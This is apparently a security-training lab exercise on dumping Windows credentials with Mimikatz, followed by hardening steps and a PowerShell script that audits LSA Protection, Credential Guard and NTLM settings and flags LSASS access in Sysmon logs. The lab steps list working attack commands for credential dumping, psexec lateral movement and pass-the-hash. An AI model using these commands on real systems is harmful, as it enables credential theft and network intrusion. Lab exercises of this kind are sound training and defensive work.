
Exercise 26: Windows Credential Dumping Using Mimikatz

May 12, 2025

Objective: Use Mimikatz to dump credentials from a Windows system to escalate privileges, and learn how to secure systems against credential dumping attacks.


Scenario: Mimikatz is a post-exploitation tool used to extract credentials from memory on Windows systems. If an attacker gains access to a Windows machine, they can use Mimikatz to dump credentials and escalate privileges or move laterally within the network. Your task is to use Mimikatz to perform credential dumping and implement best practices to prevent such attacks.


Lab Setup

  1. Environment:
    • A Windows system with administrative access.
    • Mimikatz executable.
  2. Tools Required:
    • mimikatz.exe.
    • Administrative privileges on the target system.

Lab Steps

Step 1: Download and Run Mimikatz

  1. Download Mimikatz from a trusted source or repository.
  2. Transfer Mimikatz to the target system.
  3. Open a Command Prompt with administrative privileges (Run as Administrator).
  4. Navigate to the directory containing mimikatz.exe and launch it:
     mimikatz.exe

Step 2: Dump User Credentials

  1. Enable the debug privilege:
     privilege::debug
    • This ensures Mimikatz has the required privileges.
  2. Use the sekurlsa::logonpasswords command to dump credentials from memory:
     sekurlsa::logonpasswords
    • Example output:
      Username: Administrator
      Password: password123
      Domain: WORKGROUP
  3. Save the dumped credentials for further use.

Step 3: Authenticate to Other Systems

  1. Use the extracted credentials to authenticate to other systems in the network.
  2. Test the credentials using tools like psexec or net use:
     psexec \<target_ip> -u Administrator -p password123 cmd

Step 4: Test Pass-the-Hash

  1. Extract NTLM hashes from the credential dump.
  2. Use the sekurlsa::pth command to perform a pass-the-hash attack:
     sekurlsa::pth /user:Administrator /domain:<domain_name> /ntlm:<hash> /run:cmd.exe
    • Replace <domain_name> and <hash> with the appropriate values.

Solution

Explanation:

  • Mimikatz accesses LSASS memory to extract plaintext passwords, hashes, or Kerberos tickets.
  • Attackers can use this data to escalate privileges or perform lateral movement.

Prevention:

  1. Enable LSA Protection:
    • Prevent processes from accessing LSASS memory by setting the RunAsPPL value:
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
      "RunAsPPL"=dword:00000001
  2. Enable Credential Guard:
    • Use Windows Defender Credential Guard to protect LSASS memory.
  3. Restrict Privileges:
    • Limit administrative access to critical systems.
  4. Monitor LSASS Access:
    • Use security tools to detect and block unauthorized access to LSASS.
  5. Disable NTLM Authentication:
    • Use Kerberos or certificate-based authentication where possible.
  6. Audit Account Activity:
    • Monitor login attempts and unusual behavior across systems.

Testing and Verification

  1. Attempt to run Mimikatz with LSA protection enabled to ensure it is blocked.
  2. Test Credential Guard by verifying that LSASS memory cannot be accessed.
  3. Confirm that NTLM authentication is disabled by testing legacy logins.
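A defender-side check covering the Prevention list and the Testing and Verification steps above, written as an added PowerShell example that is not part of the original exercise. It assumes Windows 10/Server 2016 or later, an elevated shell and, for the final check, Sysmon installed with ProcessAccess logging; the registry values, the Win32_DeviceGuard class and the Sysmon log name are real, while the process exclusion list is a constructed starting point to tune for your environment.

```powershell
#Requires -RunAsAdministrator
# Audits the LSA Protection, Credential Guard and NTLM settings from the
# Prevention list and looks for LSASS handle opens in Sysmon; -Enforce sets
# the registry-backed controls. RunAsPPL needs a reboot to take effect.
param([switch]$Enforce)

$lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$msv10 = Join-Path $lsa 'MSV1_0'

function Get-RegDword($Path, $Name) {
    # Missing value -> $null -> 0, so comparisons below stay simple
    [int](Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
}

# 1. LSA Protection: with RunAsPPL=1 LSASS runs as a protected process light,
#    so user-mode tools cannot open it for memory reads even from an admin shell.
$ppl = Get-RegDword $lsa 'RunAsPPL'
'LSA Protection (RunAsPPL): ' + $(if ($ppl -ge 1) { 'enabled' } else { 'NOT enabled' })
if ($Enforce -and $ppl -lt 1) {
    Set-ItemProperty -Path $lsa -Name RunAsPPL -Value 1 -Type DWord
    'RunAsPPL set to 1; reboot required.'
}

# 2. Credential Guard: Win32_DeviceGuard lists running services, 1 = Credential
#    Guard, 2 = HVCI. It is turned on via Group Policy/Intune, not by this script.
$dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
        -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
$cg = $dg -and ($dg.SecurityServicesRunning -contains 1)
'Credential Guard: ' + $(if ($cg) { 'running' } else { 'NOT running' })

# 3. NTLM: LmCompatibilityLevel 5 sends only NTLMv2 and refuses LM/NTLMv1;
#    RestrictSendingNTLMTraffic 2 blocks outbound NTLM (1 = audit only).
$lm   = Get-RegDword $lsa   'LmCompatibilityLevel'
$ntlm = Get-RegDword $msv10 'RestrictSendingNTLMTraffic'
"LmCompatibilityLevel: $lm (want 5); RestrictSendingNTLMTraffic: $ntlm (want 2; 1 to audit first)"
if ($Enforce) {
    Set-ItemProperty -Path $lsa -Name LmCompatibilityLevel -Value 5 -Type DWord
    if (-not (Test-Path $msv10)) { New-Item -Path $msv10 | Out-Null }
    # Start in audit mode and review the Microsoft-Windows-NTLM/Operational log
    # before switching to 2, otherwise legacy logins break silently.
    Set-ItemProperty -Path $msv10 -Name RestrictSendingNTLMTraffic -Value 1 -Type DWord
}

# 4. Detection (assumes Sysmon with ProcessAccess logging): Event ID 10 records
#    every handle opened to lsass.exe; a non-system SourceImage is the footprint
#    sekurlsa::logonpasswords leaves. Exclusion list is a constructed starting point.
$hits = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 } `
            -MaxEvents 500 -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'TargetImage:\s*\S*\\lsass\.exe' -and
                       $_.Message -notmatch 'SourceImage:\s*\S*\\(csrss|wininit|svchost|MsMpEng)\.exe' }
"LSASS handle opens from non-system processes (last 500 Sysmon events): $(@($hits).Count)"
$hits | Select-Object -First 5 TimeCreated, @{ n = 'Source'; e = { [regex]::Match($_.Message, 'SourceImage:\s*(\S+)').Groups[1].Value } }
```

Run it once without -Enforce to see the baseline, then re-run after the reboot to confirm RunAsPPL reports enabled before repeating Step 2 of the lab to verify LSASS is no longer readable.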

Reflection

This exercise highlights the risks posed by credential dumping using tools like Mimikatz. By identifying vulnerabilities and applying mitigations, you’ve gained valuable insights into securing Windows systems against advanced threats.
